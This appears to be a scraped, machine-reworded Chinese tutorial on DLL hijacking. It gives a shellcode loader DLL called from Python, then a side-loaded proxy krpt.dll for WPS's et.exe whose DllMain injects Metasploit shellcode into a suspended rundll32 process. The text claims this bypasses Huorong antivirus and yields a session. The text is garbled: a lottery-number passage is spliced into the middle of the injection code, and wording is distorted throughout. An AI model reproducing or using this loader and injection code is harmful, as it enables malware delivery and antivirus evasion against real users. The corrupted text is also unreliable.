| 发布日期:2024-11-06 08:47 点击次数:146 |
C&Py-DLL劫抓-话语-调用加载
1.使用visual studio创建形势
图片物联网app开发
2.将文献名重定名为.c后缀
图片
3.将如下加载器代码生成dll文献
加载器代码:
// dllmain.cpp : 界说 DLL 应用法子的进口点。
#include "pch.h"
#include <Windows.h>
#include <stdio.h>
#include <string.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows死心台法子不出黑窗口
unsigned char buf[] =生成的shellcode;
int main()
{
char* Memory;
Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, buf, sizeof(buf));
((void(*)())Memory)();
}
生成得手
图片
4.msf开启监听
图片
5.使用python履行如下代码,调用dll文献
dll.py:
from ctypes import *
#哄骗python载入dll文献
lib=CDLL('生成的dll文献旅途')
#调用dll文献内置法子函数
lib.main()
履行得手,msf得手上线
图片
6.使用打包器将dll.py文献打包成exe,履行得手上线
图片
C&C++-DLL劫抓-白加黑-导出编译
1.随性选中一个exe法子开动,使用火绒剑检察这个exe法子在开动时加载的dll文献
这里收受的是wps中的et.exe法子,开动发现加载了一个krpt.dll文献
图片
2.使用Dependencies器具对krpt.dll进行反编译
图片
3.右键导出krpt.dll源码
图片
4.使用visual studio 创建一个新形势。形势称号右键——开放形势位置——将反编译的dll源码复制进去。
图片
5.选中dll源码拖入形势,器具就会自动加载源码
图片
6.开放asm文献,将扫数的jmp语句删除
图片
7.凭据文献中的教程,选汉文献——右键属性——如下图修改——点击应用。
建设时高超:
建设:收受扫数建设
平台:收受扫数平台
图片
8.凭据教程——不息开放asm文献的属性进行建设
图片
9.形势称号——右键属性——c/c++——代码生成——开动库——多线程(/MT)
图片
10.预编译头——不使用预编译头
图片
11.运动器——调试——生成调试信息——否
图片
12.在.c文献中添加如下一滑代码
图片
13.开放.cpp文献,写入shellcode加载代码(可放荡)
如:
#include "framework.h"
#include "krpt.h"
#include "windows.h"
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
unsigned char hexData[] = "生成的shellcode";
char* v7A = (char*)VirtualAlloc(0, _countof(hexData), 0x3000u, 0x40u);
memcpy((void*)v7A, hexData, _countof(hexData));
struct _PROCESS_INFORMATION ProcessInformation;
struct _STARTUPINFOA StartupInfo;
void* v24;
福彩3D上期奖号为230,上期重号轮空。最近100期重号开出64期,物联网app开发开出比例64%,最近50期重号开出30期,开出比例60%,最近10期重号开出 5期,出现比例为50%,本期注意重号出现。
福彩3D历年第181期同期奖号为:983 419 876 073 708 417 001 500 379 918 847 248 806 281 869 569 498 168 227 371 872 567 230。
CONTEXT Context;
DWORD DwWrite = 0;
memset(&StartupInfo, 0, sizeof(StartupInfo));
StartupInfo.cb = 68;
BOOL result = CreateProcessA(0, (LPSTR)"rundll32.exe", 0, 0, 0, 0x44u, 0, 0, &StartupInfo, &ProcessInformation);
if (result)
{
Context.ContextFlags = 65539;
GetThreadContext(ProcessInformation.hThread, &Context);
v24 = VirtualAllocEx(ProcessInformation.hProcess, 0, _countof(hexData), 0x1000u, 0x40u);
WriteProcessMemory(ProcessInformation.hProcess, v24, v7A, _countof(hexData), &DwWrite);
Context.Eip = (DWORD)v24;
SetThreadContext(ProcessInformation.hThread, &Context);
ResumeThread(ProcessInformation.hThread);
CloseHandle(ProcessInformation.hThread);
result = CloseHandle(ProcessInformation.hProcess);
app}
TerminateProcess(GetCurrentProcess(), 0);
};
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
得手生成dll文献
图片
14.将生成的dll文献更名位krpt.dll和et.exe一皆上传到臆度系统
开动et.exe,得手绕极端绒检测,msf得手上线
图片
本站仅提供存储干事,扫数施行均由用户发布,如发现存害或侵权施行,请点击举报。